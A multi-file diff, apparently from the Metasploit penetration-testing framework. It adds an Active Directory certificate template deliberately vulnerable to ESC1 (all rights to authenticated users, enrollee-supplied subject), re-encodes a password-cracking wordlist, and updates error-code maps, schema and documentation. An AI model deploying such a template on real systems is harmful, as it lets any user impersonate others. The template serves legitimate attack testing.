+# Creates a template that will be vulnerable to ESC 1 (subject name supplied in
+# the request). Fields are based on the SubCA template. For field descriptions,
+# see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
+showInAdvancedViewOnly: 'TRUE'
+# this security descriptor grants all permissions to all authenticated users
+nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
+flags: 0
+pKIDefaultKeySpec: 2
+pKIKeyUsage: !binary |-
+  hgA=
+pKIMaxIssuingDepth: -1
+pKICriticalExtensions:
+- 2.5.29.19
+- 2.5.29.15
+pKIExpirationPeriod: !binary |-
+  AEAepOhl+v8=
+pKIOverlapPeriod: !binary |-
+  AICmCv/e//8=
+pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
+msPKI-RA-Signature: 0
+msPKI-Enrollment-Flag: 0
+# CT_FLAG_EXPORTABLE_KEY
+msPKI-Private-Key-Flag: 0x10
+# CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
+msPKI-Certificate-Name-Flag: 1
+msPKI-Minimal-Key-Size: 2048
@@ -117,6 +117,13 @@

 <%= normalize_pull_requests(items[:mod_pull_requests]) %>

+<%- attacker_kb_references = normalize_attackerkb_references(items[:mod_refs]) %>
+<% unless attacker_kb_references.empty? %>
+## AttackerKB references
+
+<%= attacker_kb_references %>
+<% end %>
+
 <% unless items[:mod_refs].empty? %>
 ## References

@@ -0,0 +1,101 @@
+# Mostly from https://docs.rocketsoftware.com/bundle/grv1653317862214_grv1653317862214/page/nhb1653316841876.html
+{
+  0: "UVE_NOERROR",
+  14002: "UVE_ENOENT",
+  14005: "UVE_EIO",
+  14009: "UVE_EBADF",
+  14012: "UVE_ENOMEM",
+  14013: "UVE_EACCES",
+  14022: "UVE_EINVAL",
+  14023: "UVE_ENFILE",
+  14024: "UVE_EMFILE",
+  14028: "UVE_ENOSPC",
+  14551: "UVE_NETUNREACH",
+  22001: "UVE_BFN",
+  22002: "UVE_BTS",
+  20003: "UVE_IID",
+  22004: "UVE_LRR",
+  22005: "UVE_NFI",
+  30001: "UVE_RNF",
+  30002: "UVE_LCK",
+  30095: "UVE_FIFS",
+  30097: "UVE_SELFAIL",
+  30098: "UVE_LOCKINVALID",
+  30099: "UVE_SEQOPENED",
+  30100: "UVE_HASHOPENED",
+  30101: "UVE_SEEKFAILED",
+  30103: "UVE_INVALIDATKEY",
+  30105: "UVE_UNABLETOLOADSUB",
+  30106: "UVE_BADNUMARGS",
+  30107: "UVE_SUBERROR",
+  30108: "UVE_ITYPEFTC",
+  30109: "UVE_ITYPEFAILEDTOLOAD",
+  30110: "UVE_ITYPENOTCOMPILED",
+  30111: "UVE_BADITYPE",
+  30112: "UVE_INVALIDFILENAME",
+  30113: "UVE_WEOFFAILED",
+  30114: "UVE_EXECUTEISACTIVE",
+  30115: "UVE_EXECUTENOTACTIVE",
+  30124: "UVE_TX_ACTIVE",
+  30125: "UVE_CANT_ACCESS_PF",
+  30126: "UVE_FAIL_TO_CANCEL",
+  30127: "UVE_INVALID_INFO_KEY",
+  30128: "UVE_CREATE_FAILED",
+  30129: "UVE_DUPHANDLE_FAILED",
+  31000: "UVE_NVR",
+  31001: "UVE_NPN",
+  39101: "UVE_NODATA",
+  39119: "UVE_AT_INPUT",
+  39120: "UVE_SESSION_NOT_OPEN",
+  39121: "UVE_UVEXPIRED",
+  39122: "UVE_CSVERSION",
+  39123: "UVE_COMMSVERSION",
+  39124: "UVE_BADSIG",
+  39125: "UVE_BADDIR",
+  39127: "UVE_BAD_UVHOME",
+  39128: "UVE_INVALIDPATH",
+  39129: "UVE_INVALIDACCOUNT",
+  39130: "UVE_BAD_UVACCOUNT_FILE",
+  39131: "UVE_FTA_NEW_ACCOUNT",
+  39134: "UVE_ULR",
+  39135: "UVE_NO_NLS",
+  39136: "UVE_MAP_NOT_FOUND",
+  39137: "UVE_NO_LOCALE",
+  39138: "UVE_LOCALE_NOT_FOUND",
+  39139: "UVE_CATEGORY_NOT_FOUND",
+  39201: "UVE_SR_SOCK_CON_FAIL",
+  39210: "UVE_SR_SELECT_FAIL",
+  39211: "UVE_SR_SELECT_TIMEOUT",
+  40001: "UVE_INVALIDFIELD",
+  40002: "UVE_SESSIONEXISTS",
+  40003: "UVE_BADPARAM",
+  40004: "UVE_BADOBJECT",
+  40005: "UVE_NOMORE",
+  40006: "UVE_NOTATINPUT",
+  40007: "UVE_INVALID_DATAFIELD",
+  40008: "UVE_BAD_DICTIONARY_ ENTRY",
+  40009: "UVE_BAD_CONVERSION_ DATA",
+  45000: "UVE_FILE_NOT_OPEN",
+  45001: "UVE_OPENSESSION_ERR",
+  45002: "UVE_NONNULL_RECORDID",
+  80011: "UVE_BAD_LOGINNAME",
+  80019: "UVE_BAD_PASSWORD",
+  80144: "UVE_ACCOUNT_EXPIRED",
+  80147: "UVE_RUN_REMOTE_FAILED",
+  80148: "UVE_UPDATE_USER_FAILED",
+  81001: "UVE_RPC_BAD_CONNECTION",
+  81002: "UVE_RPC_NO_CONNECTION",
+  81005: "UVE_RPC_WRONG_VERSION",
+  81007: "UVE_RPC_NO_MORE_ CONNECTIONS",
+  81009: "UVE_RPC_FAILED",
+  81011: "UVE_RPC_UNKNOWN_HOST",
+  81014: "UVE_RPC_CANT_FIND_ SERVICE",
+  81015: "UVE_RPC_TIMEOUT",
+  81016: "UVE_RPC_REFUSED",
+  81017: "UVE_RPC_SOCKET_INIT_ FAILED",
+  81018: "UVE_RPC_SERVICE_PAUSED",
+  81019: "UVE_RPC_BAD_TRANSPORT",
+  81020: "UVE_RPC_BAD_PIPE",
+  81021: "UVE_RPC_PIPE_WRITE_ERROR",
+  81022: "UVE_RPC_PIPE_READ_ERROR"
+}
@@ -274,8 +274,8 @@ abbreviating
 abbreviation
 abby
 abbye
-abbé
-abbés
+abbé
+abbés
 abc
 abc123
 abcd
@@ -975,7 +975,7 @@ adipose
 adiposes
 adirondack
 adirondacks
-adiós
+adiós
 adj
 adjacency
 adjacent
@@ -1573,7 +1573,7 @@ aidan
 aide
 aide-de-camp
 aide-memoires
-aide-mémoire
+aide-mémoire
 aided
 aider
 aides-de-camp
@@ -3006,7 +3006,7 @@ animistic
 animized
 animosity
 animus
-animé
+animé
 anion
 anionic
 anise
@@ -3615,10 +3615,10 @@ applicator
 applier
 appliers
 applique
-appliqué
-appliquéd
-appliquéing
-appliqués
+appliqué
+appliquéd
+appliquéing
+appliqués
 apply
 appoint
 appointee
@@ -4274,8 +4274,8 @@ arvy
 aryan
 aryanism
 aryn
-arête
-arêtes
+arête
+arêtes
 as
 asa
 asama
@@ -4618,7 +4618,7 @@ asturias
 astute
 astuteness
 asuncion
-asunción
+asunción
 asunder
 aswan
 asyllabic
@@ -4643,7 +4643,7 @@ atalanta
 atamelang
 atari
 ataturk
-atatürk
+atatürk
 atavism
 atavist
 atavistic
@@ -4742,7 +4742,7 @@ attached
 attacher
 attaches
 attachment
-attaché
+attaché
 attack
 attackable
 attacker
@@ -6141,7 +6141,7 @@ bartolomeo
 barton
 bartram
 barty
-bartók
+bartók
 baruch
 barvale
 barvallen
@@ -7880,7 +7880,7 @@ blast
 blaster
 blasting
 blastoff
-blasé
+blasé
 blat
 blatancy
 blatant
@@ -8433,7 +8433,7 @@ bogotified
 bogotifies
 bogotify
 bogotifying
-bogotá
+bogotá
 bogus
 bogy
 bogyman
@@ -8911,7 +8911,7 @@ botulinum
 botulinus
 botulism
 boucher
-bouclé
+bouclé
 boudicca
 boudoir
 bouffant
@@ -8962,13 +8962,13 @@ bourne
 bournemouth
 bourree
 bourses
-bourée
+bourée
 boustrophedon
 bout
 boutique
 boutonniere
-boutonnière
-boutonnières
+boutonnière
+boutonnières
 bouvier
 bouzouki
 bovary
@@ -9052,7 +9052,7 @@ boyscout
 boysenberry
 boyup
 bozo
-boötes
+boötes
 bp
 bpi
 bpoe
@@ -9435,7 +9435,7 @@ bribery
 bribie
 bric
 bric-a-brac
-bric-à-brac
+bric-à-brac
 brice
 brick
 brick-red
@@ -10472,7 +10472,7 @@ buzzer
 buzzing
 buzzword
 buzzy
-buñuel
+buñuel
 bx
 bxs
 by
@@ -10528,10 +10528,10 @@ byway
 byword
 byzantine
 byzantium
-bêche
-bête
-bêtes
-bêtise
+bêche
+bête
+bêtes
+bêtise
 c
 c.elegans
 c.lit.
@@ -10646,8 +10646,8 @@ caffeinated
 caffeine
 caftan
 cafutweni
-café
-cafés
+café
+cafés
 cage
 caged
 cager
@@ -10962,8 +10962,8 @@ canalization
 canalize
 canalling
 canape
-canapé
-canapés
+canapé
+canapés
 canard
 canaries
 canary
@@ -13334,11 +13334,11 @@ chutzpahs
 chuvash
 chweni
 chyme
-château
-châteaus
-châteaux
-châtelaine
-châtelaines
+château
+châteaus
+châteaux
+châtelaine
+châtelaines
 ci
 cia
 ciao
@@ -13840,15 +13840,15 @@ clewer
 cliburn
 cliche
 cliched
-cliché
-clichéd
-clichés
+cliché
+clichéd
+clichés
 click
 clicker
 clicking
 client
 clientele
-clientèle
+clientèle
 cliff
 cliff-hanger
 cliffdale
@@ -13951,7 +13951,7 @@ clogged
 clogging
 cloisonne
 cloisonnes
-cloisonné
+cloisonné
 cloister
 cloistral
 clomp
@@ -14968,7 +14968,7 @@ communing
 communion
 communique
 communiques
-communiqué
+communiqué
 communise
 communism
 communist
@@ -15196,8 +15196,8 @@ computerize
 computes
 computicket
 computing
-compère
-compères
+compère
+compères
 comrade
 comradeliest
 comradeliness
@@ -15241,7 +15241,7 @@ concentrator
 concentric
 concentrically
 concepcion
-concepción
+concepción
 concept
 conception
 conceptional
@@ -15504,8 +15504,8 @@ confrontation
 confrontational
 confrontationally
 confronter
-confrère
-confrères
+confrère
+confrères
 confucian
 confucianism
 confucius
@@ -15755,8 +15755,8 @@ consolidation
 consolidator
 consoling
 consomme
-consommé
-consommés
+consommé
+consommés
 consonance
 consonances
 consonant
@@ -16539,8 +16539,8 @@ cortisone
 cortland
 cortney
 corty
-cortège
-cortèges
+cortège
+cortèges
 corundum
 coruscate
 coruscation
@@ -16657,8 +16657,8 @@ coulis
 coulomb
 coulter
 coulthard
-coulée
-coulées
+coulée
+coulées
 council
 councillor
 councilman
@@ -16791,7 +16791,7 @@ couples
 couplet
 coupling
 coupon
-coupé
+coupé
 cour
 courage
 courageous
@@ -17506,8 +17506,8 @@ crowning
 crows
 croydon
 crozier
-croûton
-croûtons
+croûton
+croûtons
 crt
 crucial
 cruciate
@@ -17526,7 +17526,7 @@ crude
 crudeness
 crudites
 crudity
-crudités
+crudités
 cruel
 cruelled
 cruelling
@@ -17634,12 +17634,12 @@ crystallographer
 crystallographic
 crystallography
 crystie
-crèche
-crèches
-crème
-crêpe
-crêpes
-crêpey
+crèche
+crèches
+crème
+crêpe
+crêpes
+crêpey
 cs
 csa
 cse
@@ -18113,7 +18113,7 @@ czechoslovakian
 czechs
 czerniak
 czerny
-côte
+côte
 d
 da
 daantjie
@@ -18299,7 +18299,7 @@ damson
 dan
 dana
 danarand
-danaë
+danaë
 danbury
 dance
 danceable
@@ -19951,8 +19951,8 @@ derrik
 derril
 derrinallum
 derringer
-derrière
-derrières
+derrière
+derrières
 derron
 derry
 dersley
@@ -20447,7 +20447,7 @@ diamagnetic
 diamante
 diamanthoogte
 diamantina
-diamanté
+diamanté
 diameter
 diametric
 diametrical
@@ -21077,8 +21077,8 @@ discordant
 discorporate
 discorporated
 discotheque
-discothèque
-discothèques
+discothèque
+discothèques
 discount
 discountability
 discountable
@@ -21613,9 +21613,9 @@ divisor
 divorce
 divorcee
 divorcement
-divorcé
-divorcée
-divorcées
+divorcé
+divorcée
+divorcées
 divot
 divulge
 divvy
@@ -22000,7 +22000,7 @@ dopiness
 dopinesses
 doping
 doppelganger
-doppelgänger
+doppelgänger
 doppies
 doppler
 dopy
@@ -22077,7 +22077,7 @@ dorthea
 dorthy
 dortmund
 dory
-doré
+doré
 dos
 dosage
 dose
@@ -22553,7 +22553,7 @@ drowse
 drowsily
 drowsiness
 drowsy
-droëwors
+droëwors
 dru
 drub
 drubbed
@@ -22948,7 +22948,7 @@ duynefontein
 dvd
 dvina
 dvorak
-dvorák
+dvorák
 dwaal
 dwaalboom
 dwain
@@ -23034,33 +23034,33 @@ dzimauli
 dzongkha
 dzumeri
 dzungaria
-début
-débutante
-débutantes
-débuts
-débâcle
-débâcles
-déclassé
-déclassée
-décolletage
-décolletages
-décolleté
-décolletée
-décor
-décors
-découpage
-déjà
-démodé
-dénouement
-dépaysé
-dépaysée
-dérailleur
-dérailleurs
-déshabillé
-détente
-détentes
-dürer
-düsseldorf
+début
+débutante
+débutantes
+débuts
+débâcle
+débâcles
+déclassé
+déclassée
+décolletage
+décolletages
+décolleté
+décolletée
+décor
+décors
+découpage
+déjà
+démodé
+dénouement
+dépaysé
+dépaysée
+dérailleur
+dérailleurs
+déshabillé
+détente
+détentes
+dürer
+düsseldorf
 e
 e-commerce
 e-mail
@@ -24137,7 +24137,7 @@ elysia
 elysian
 elysium
 elyssa
-elysée
+elysée
 em
 ema
 emabheleni
@@ -24869,8 +24869,8 @@ entreatingly
 entreaty
 entrechat
 entrecote
-entrecôte
-entrecôtes
+entrecôte
+entrecôtes
 entree
 entrees
 entremets
@@ -24880,8 +24880,8 @@ entrepot
 entrepreneur
 entrepreneurial
 entrepreneurship
-entrepôt
-entrepôts
+entrepôt
+entrepôts
 entries
 entropic
 entropy
@@ -24890,8 +24890,8 @@ entry
 entryphone
 entryphones
 entryway
-entrée
-entrées
+entrée
+entrées
 entshonalanga
 entshongwe
 entumbane
@@ -25442,7 +25442,7 @@ ester
 estera
 esterase
 esterhazy
-esterházy
+esterházy
 esterpark
 estes
 estevan
@@ -26239,8 +26239,8 @@ expository
 expostulate
 expostulation
 exposure
-exposé
-exposés
+exposé
+exposés
 expound
 expounder
 express
@@ -26493,7 +26493,7 @@ fab
 fabe
 faber
 faberge
-fabergé
+fabergé
 fabian
 fabiano
 fabians
@@ -27073,10 +27073,10 @@ fays
 fayth
 faythe
 faze
-façade
-façades
-faïence
-faïences
+façade
+façades
+faïence
+faïences
 fbi
 fcc
 fd
@@ -27438,10 +27438,10 @@ fi
 fia
 fiance
 fiancee
-fiancé
-fiancée
-fiancées
-fiancés
+fiancé
+fiancée
+fiancées
+fiancés
 fiann
 fianna
 fiasco
@@ -28051,10 +28051,10 @@ flambes
 flamboyance
 flamboyancy
 flamboyant
-flambé
-flambéed
-flambéing
-flambés
+flambé
+flambéed
+flambéing
+flambés
 flame
 flame-proof
 flame-proofed
@@ -29111,7 +29111,7 @@ fosterer
 fostering
 fotomat
 foucault
-fouché
+fouché
 fought
 foul
 foul-mouth
@@ -29306,14 +29306,14 @@ franticness
 frants
 franz
 franzen
-françois
-françoise
+françois
+françoise
 frap
 frappe
 frappeed
 frappeing
 frappes
-frappé
+frappé
 frasco
 fraser
 fraserburg
@@ -29993,11 +29993,11 @@ fy
 fyi
 fynbos
 fynnland
-fête
-fêtes
-föhn
-führer
-führers
+fête
+fêtes
+föhn
+führer
+führers
 g
 g-string
 g-strings
@@ -30428,8 +30428,8 @@ garwin
 garwood
 gary
 garza
-garçon
-garçons
+garçon
+garçons
 gas
 gas-permeable
 gasbag
@@ -31012,7 +31012,7 @@ gettysburg
 getup
 gewgaw
 gewurztraminer
-gewürztraminer
+gewürztraminer
 geysdorp
 geyser
 gezangave
@@ -31316,10 +31316,10 @@ glaciological
 glaciologist
 glaciology
 glacis
-glacé
-glacéed
-glacéing
-glacés
+glacé
+glacéed
+glacéing
+glacés
 glad
 gladded
 gladden
@@ -32726,11 +32726,11 @@ grus
 grusky
 gruyere
 gruyeres
-gruyère
+gruyère
 gryphon
 grysvok
-grâce
-grünewald
+grâce
+grünewald
 gs
 gsa
 gsm
@@ -33098,8 +33098,8 @@ gyromagnetic
 gyroscope
 gyroscopic
 gyve
-gödel
-göteborg
+gödel
+göteborg
 h
 h2opolo
 ha
@@ -33137,8 +33137,8 @@ habitualness
 habituate
 habituation
 habitue
-habitué
-habitués
+habitué
+habitués
 hacienda
 hack
 hackable
@@ -36618,7 +36618,7 @@ hysterical
 hystericism
 hyundai
 hz
-héloise
+héloise
 i
 i.e.
 ia
@@ -38232,8 +38232,8 @@ inguinal
 ingunna
 ingvar
 ingwavuma
-ingénue
-ingénues
+ingénue
+ingénues
 inhabit
 inhabitable
 inhabitance
@@ -39844,8 +39844,8 @@ jakey
 jakie
 jakob
 jalapeno
-jalapeño
-jalapeños
+jalapeño
+jalapeños
 jalopy
 jalousie
 jam
@@ -39963,8 +39963,8 @@ jarad
 jard
 jardine
 jardiniere
-jardinière
-jardinières
+jardinière
+jardinières
 jareb
 jared
 jarful
@@ -40579,7 +40579,7 @@ jostle
 jostling
 josue
 josy
-josé
+josé
 jot
 jotted
 jotter
@@ -41766,8 +41766,8 @@ kinder
 kindergarten
 kindergartener
 kindergartner
-kindergärtner
-kindergärtners
+kindergärtner
+kindergärtners
 kindest
 kindhearted
 kindheartedness
@@ -42434,8 +42434,8 @@ krystal
 krystalle
 krystle
 krystyna
-króna
-krónur
+króna
+krónur
 ks
 kshatriya
 kt
@@ -42926,7 +42926,7 @@ lamport
 lamppost
 lamprey
 lampshade
-lamé
+lamé
 lan
 lana
 lanae
@@ -44646,8 +44646,8 @@ littleness
 littleton
 litton
 littoral
-littérateur
-littérateurs
+littérateur
+littérateurs
 liturgic
 liturgical
 liturgics
@@ -44939,7 +44939,7 @@ lombard
 lombardi
 lombardy
 lome
-lomé
+lomé
 lon
 lona
 london
@@ -45496,7 +45496,7 @@ luminescent
 luminosity
 luminous
 luminousness
-lumière
+lumière
 lumku
 lummox
 lump
@@ -45655,7 +45655,7 @@ lychgate
 lycopodium
 lycra
 lycurgus
-lycée
+lycée
 lyda
 lydenburg
 lydia
@@ -45858,8 +45858,8 @@ macos
 macpaint
 macquarie
 macrame
-macramé
-macramés
+macramé
+macramés
 macro
 macrobiotic
 macrobiotics
@@ -46414,7 +46414,7 @@ mallala
 mallapunyah
 mallard
 mallarme
-mallarmé
+mallarmé
 malleability
 malleable
 malleableness
@@ -46696,7 +46696,7 @@ manorial
 manpower
 manque
 manquzu
-manqué
+manqué
 mans
 mansard
 manse
@@ -46758,10 +46758,10 @@ manzengwenya
 manzi
 manzibomvu
 manzimahle
-manège
-manèged
-manèges
-manèging
+manège
+manèged
+manèges
+manèging
 mao
 maoism
 maoist
@@ -47448,7 +47448,7 @@ matimatolo
 matinee
 mating
 matins
-matinée
+matinée
 matisse
 matiwane
 matjeka
@@ -47540,8 +47540,8 @@ matzoh
 matzot
 matzoth
 matzotshweni
-matériel
-matériels
+matériel
+matériels
 mau
 maubane
 maud
@@ -47688,8 +47688,8 @@ mazourka
 mazurka
 mazy
 mazzini
-maître
-mañana
+maître
+mañana
 mb
 mba
 mbabane
@@ -51549,15 +51549,15 @@ mzomusha
 mzonga
 mzonyane
 mzotho
-mélange
-mémoire
-ménage
-métier
-métiers
-mêlée
-mêlées
-möbius
-münchhausen
+mélange
+mémoire
+ménage
+métier
+métiers
+mêlée
+mêlées
+möbius
+münchhausen
 n
 na
 naaco
@@ -51632,8 +51632,8 @@ naive
 naiveness
 naivete
 naivety
-naiveté
-naivetés
+naiveté
+naivetés
 nakamura
 nakayama
 naked
@@ -51939,13 +51939,13 @@ nazca
 nazi
 naziism
 nazism
-naïve
-naïvely
-naïveness
-naïveties
-naïvety
-naïveté
-naïvetés
+naïve
+naïvely
+naïveness
+naïveties
+naïvety
+naïveté
+naïvetés
 nb
 nba
 nbc
@@ -52136,8 +52136,8 @@ negligent
 negligibility
 negligible
 negligibly
-negligée
-negligées
+negligée
+negligées
 negotiability
 negotiable
 negotiant
@@ -54074,10 +54074,10 @@ nouakchott
 nougat
 nought
 noumea
-nouméa
+nouméa
 noun
 nounal
-nounéa
+nounéa
 noupoort
 nourish
 nourished
@@ -54431,10 +54431,10 @@ nzima
 nzimakazi
 nzokhulayo
 nzombane
-nè
-né
-née
-négligé
+nè
+né
+née
+négligé
 o
 oaf
 oafish
@@ -55069,7 +55069,7 @@ olympian
 olympic
 olympie
 olympus
-olé
+olé
 om
 omagh
 omaha
@@ -55933,7 +55933,7 @@ outrigger
 outright
 outrun
 outrunning
-outré
+outré
 outscore
 outsell
 outset
@@ -57060,7 +57060,7 @@ paranoiac
 paranoid
 paranormal
 paranormally
-paraná
+paraná
 parapet
 paraphernalia
 paraphrase
@@ -57357,8 +57357,8 @@ passwd
 password
 password1
 passworded
-passé
-passée
+passé
+passée
 past
 pasta
 paste
@@ -59360,10 +59360,10 @@ pizzazz
 pizzeria
 pizzicati
 pizzicato
-piñata
-piñatas
-piñon
-piñons
+piñata
+piñatas
+piñon
+piñons
 pj
 pk
 pkg
@@ -59854,7 +59854,7 @@ poignancy
 poignant
 poikilothermic
 poincare
-poincaré
+poincaré
 poinciana
 poincianas
 poindexter
@@ -60303,8 +60303,8 @@ portie
 portiere
 porting
 portion
-portière
-portières
+portière
+portières
 portland
 portliness
 portly
@@ -61002,10 +61002,10 @@ premise
 premiss
 premium
 premix
-première
-premièred
-premières
-premièring
+première
+premièred
+premières
+premièring
 premolar
 premonition
 premonitory
@@ -61923,10 +61923,10 @@ protrusively
 protrusiveness
 protuberance
 protuberant
-protégé
-protégée
-protégées
-protégés
+protégé
+protégée
+protégées
+protégés
 proud
 proudhon
 proust
@@ -61946,7 +61946,7 @@ provence
 provender
 provenience
 provenly
-provençal
+provençal
 prover
 proverb
 proverbial
@@ -62019,10 +62019,10 @@ pryce
 pryer
 prying
 pryor
-précis
-précised
-précises
-précising
+précis
+précised
+précises
+précising
 ps
 psalm
 psalmist
@@ -62429,10 +62429,10 @@ purvey
 purveyance
 purveyor
 purview
-purée
-puréed
-puréeing
-purées
+purée
+puréed
+puréeing
+purées
 pus
 pusan
 pusey
@@ -62580,10 +62580,10 @@ pyxidia
 pyxidium
 pyxis
 pzazz
-pâté
-pères
-pétain
-pôrto
+pâté
+pères
+pétain
+pôrto
 q
 q-tips.
 q-town
@@ -63018,6 +63018,7 @@ r1
 r1s
 r4
 r4s
+r50$K28vaIFiYxaY
 ra
 raapkraal
 rab
@@ -63215,7 +63216,7 @@ ragingly
 raglan
 ragnar
 ragnarok
-ragnarök
+ragnarök
 ragout
 rags-to-riches
 ragtag
@@ -64150,7 +64151,7 @@ recharter
 recheck
 recherche
 recherches
-recherché
+recherché
 rechristen
 recidivism
 recidivist
@@ -65462,7 +65463,7 @@ repute
 reputed
 reputes
 reputing
-repêchage
+repêchage
 request
 requested
 requester
@@ -66490,7 +66491,7 @@ risorgimento
 risotto
 rispark
 risque
-risqué
+risqué
 rissole
 rita
 ritalin
@@ -67101,7 +67102,7 @@ rostropovich
 rostrum
 roswell
 rosy
-rosé
+rosé
 rot
 rot-gut
 rota
@@ -67211,8 +67212,8 @@ routinize
 rouvin
 roux
 rouxville
-roué
-roués
+roué
+roués
 rove
 rover
 roving
@@ -67604,13 +67605,13 @@ ryon
 rysmierbult
 ryukyu
 ryun
-régime
-régimes
-résumé
-résumés
-réunion
-rôle
-rôles
+régime
+régimes
+résumé
+résumés
+réunion
+rôle
+rôles
 s
 sa
 saa
@@ -68354,10 +68355,10 @@ saussure
 saute
 sauterne
 sauternes
-sauté
-sautéed
-sautéing
-sautés
+sauté
+sautéed
+sautéing
+sautés
 sauveur
 savable
 savage
@@ -68721,7 +68722,7 @@ schrod
 schrodinger
 schroeder
 schroedinger
-schrödinger
+schrödinger
 schtick
 schubert
 schuinshoogte
@@ -70196,12 +70197,12 @@ seychelles
 seyfert
 seymour
 sezela
-señor
-señora
-señoras
-señores
-señorita
-señoritas
+señor
+señora
+señoras
+señores
+señorita
+señoritas
 sf
 sforzandi
 sforzando
@@ -72452,7 +72453,7 @@ smutting
 smutty
 smyrna
 smythesdale
-smörgåsbord
+smörgåsbord
 sn
 snaaks
 snack
@@ -72823,13 +72824,13 @@ soi
 soi-disant
 soigne
 soignee
-soigné
+soigné
 soil
 soiled
 soiling
 soiree
-soirée
-soirées
+soirée
+soirées
 sojourn
 sojourner
 sojourning
@@ -73126,8 +73127,8 @@ sottish
 sou
 soubriquet
 souffle
-soufflé
-soufflés
+soufflé
+soufflés
 sough
 soughing
 soughs
@@ -73161,8 +73162,8 @@ soup
 soupcon
 souphanouvong
 soupy
-soupçon
-soupçons
+soupçon
+soupçons
 sour
 source
 sourced
@@ -76890,9 +76891,9 @@ szechuan
 szechwan
 szilard
 szymborska
-são
-séance
-séances
+são
+séance
+séances
 t
 t-bone
 t-junction
@@ -77263,7 +77264,7 @@ tannery
 tannest
 tanney
 tannhauser
-tannhäuser
+tannhäuser
 tannie
 tannin
 tanning
@@ -78405,7 +78406,7 @@ thespis
 thessalonian
 thessalonians
 thessaloniki
-thessaloníki
+thessaloníki
 thessaly
 theta
 theunissen
@@ -79406,7 +79407,7 @@ tomorrow
 tompkins
 tomsk
 tomtit
-tomé
+tomé
 ton
 tonal
 tonality
@@ -79700,7 +79701,7 @@ touchstone
 touchwood
 touchy
 touchy-feely
-touché
+touché
 tough
 tough-minded
 toughen
@@ -81328,10 +81329,10 @@ tzarist
 tzatziki
 tzeltal
 tzigane
-tête
-tête-bêche
-tête-à-tête
-tórshavn
+tête
+tête-bêche
+tête-à-tête
+tórshavn
 u
 uar
 uart
@@ -83891,7 +83892,7 @@ valvoline
 valvular
 valvules
 valyland
-valéry
+valéry
 vamoose
 vamp
 vamped
@@ -84138,8 +84139,8 @@ velvet
 velveted
 velveteen
 velvety
-velásquez
-velázquez
+velásquez
+velázquez
 venables
 venal
 venality
@@ -84508,8 +84509,8 @@ victualer
 victualler
 victualling
 vicuna
-vicuña
-vicuñas
+vicuña
+vicuñas
 vida
 vidal
 vide
@@ -84711,7 +84712,7 @@ virulence
 virulent
 virus
 vis
-vis-à-vis
+vis-à-vis
 visa
 visage
 visagiepark
@@ -84938,13 +84939,13 @@ voidness
 voids
 voila
 voile
-voilà
+voilà
 voip
 vol
 vol-au-vent
 vol.
 volapuk
-volapük
+volapük
 volar
 volatile
 volatileness
@@ -87786,7 +87787,7 @@ yankton
 yao
 yaobang
 yaounde
-yaoundé
+yaoundé
 yap
 yapped
 yapping
@@ -88383,15 +88384,15 @@ zymurgy
 zyrtec
 zyuganov
 zzz
-zürich
-Ågar
-Ångström
-éclair
-éclairs
-éclat
-élan
-émigré
-émigrés
-épée
-étude
+zürich
+Ågar
+Ångström
+éclair
+éclairs
+éclat
+élan
+émigré
+émigrés
+épée
+étude
 vagrant
@@ -0,0 +1,2 @@
+Contains `modules_metadata_base.json` which contains information about all modules within Metasploit, as well as
+`schema.rb` which describes current state of the database schema maintained by Rails ActiveRecord.
@@ -10,7 +10,7 @@
 #
 # It's strongly recommended that you check this file into your version control system.

-ActiveRecord::Schema[7.0].define(version: 2019_05_07_120211) do
+ActiveRecord::Schema[7.0].define(version: 2022_12_09_005658) do
  # These are extensions that must be enabled in order to support this database
  enable_extension "plpgsql"

@@ -314,8 +314,9 @@ ActiveRecord::Schema[7.0].define(version: 2019_05_07_120211) do
    t.datetime "created_at", precision: nil, null: false
    t.datetime "updated_at", precision: nil, null: false
    t.string "jtr_format"
+    t.index "type, decode(md5(data), 'hex'::text)", name: "index_metasploit_credential_privates_on_type_and_data_pkcs12", unique: true, where: "((type)::text = 'Metasploit::Credential::Pkcs12'::text)"
    t.index "type, decode(md5(data), 'hex'::text)", name: "index_metasploit_credential_privates_on_type_and_data_sshkey", unique: true, where: "((type)::text = 'Metasploit::Credential::SSHKey'::text)"
-    t.index ["type", "data"], name: "index_metasploit_credential_privates_on_type_and_data", unique: true, where: "(NOT ((type)::text = 'Metasploit::Credential::SSHKey'::text))"
+    t.index ["type", "data"], name: "index_metasploit_credential_privates_on_type_and_data", unique: true, where: "(NOT (((type)::text = 'Metasploit::Credential::SSHKey'::text) OR ((type)::text = 'Metasploit::Credential::Pkcs12'::text)))"
  end

  create_table "metasploit_credential_publics", id: :serial, force: :cascade do |t|
@@ -1,3 +1,6 @@
+# Folder Purpose
+This folder contains files related to running Metasploit inside Docker.
+
 # Metasploit in Docker
 ## Getting Started

@@ -1,19 +1,60 @@
 // Handle opening/closing module overview list items
 jtd.onReady(function(ready) {
-    var moduleStructures = document.querySelectorAll('.module-structure');
-    for (var i = 0; i < moduleStructures.length; i++) {
-        jtd.addEvent(moduleStructures[i], 'click', function (e) {
+    var forEach = function (list, callback) {
+        for (var i = 0; i < list.length; i++) {
+            callback(list[i])
+        }
+    };
+
+    // Bind listeners for expand all / collapse all functionality
+    var bindToggleAll = function (selector, options) {
+        var isOpen = options.open;
+        var expandAllButtons = document.querySelectorAll(selector);
+        forEach(expandAllButtons, function (button) {
+            jtd.addEvent(button, 'click', function (e) {
+                var originalTarget = e.target || e.srcElement || e.originalTarget;
+                if (originalTarget.tagName !== 'A') { return; }
+
+                var moduleList = originalTarget.closest('.module-list');
+                forEach(moduleList.querySelectorAll('.folder > ul'), function (list) {
+                    if (isOpen) {
+                        list.classList.add('open');
+                    } else {
+                        list.classList.remove('open');
+                    }
+                })
+
+                e.preventDefault();
+            });
+        });
+    };
+    bindToggleAll('.module-list [data-expand-all]', { open: true })
+    bindToggleAll('.module-list [data-collapse-all]', { open: false })
+
+    // Bind listeners for collapsing module navigation items
+    var moduleStructureElements = document.querySelectorAll('.module-structure');
+    forEach(moduleStructureElements, function (moduleStructure) {
+        jtd.addEvent(moduleStructure, 'click', function (e) {
            var originalTarget = e.target || e.srcElement || e.originalTarget;
            if (originalTarget.tagName !== 'A') { return; }

            var parentListItem = originalTarget.closest('li');
            if (parentListItem.className.indexOf('folder') === -1) { return; }

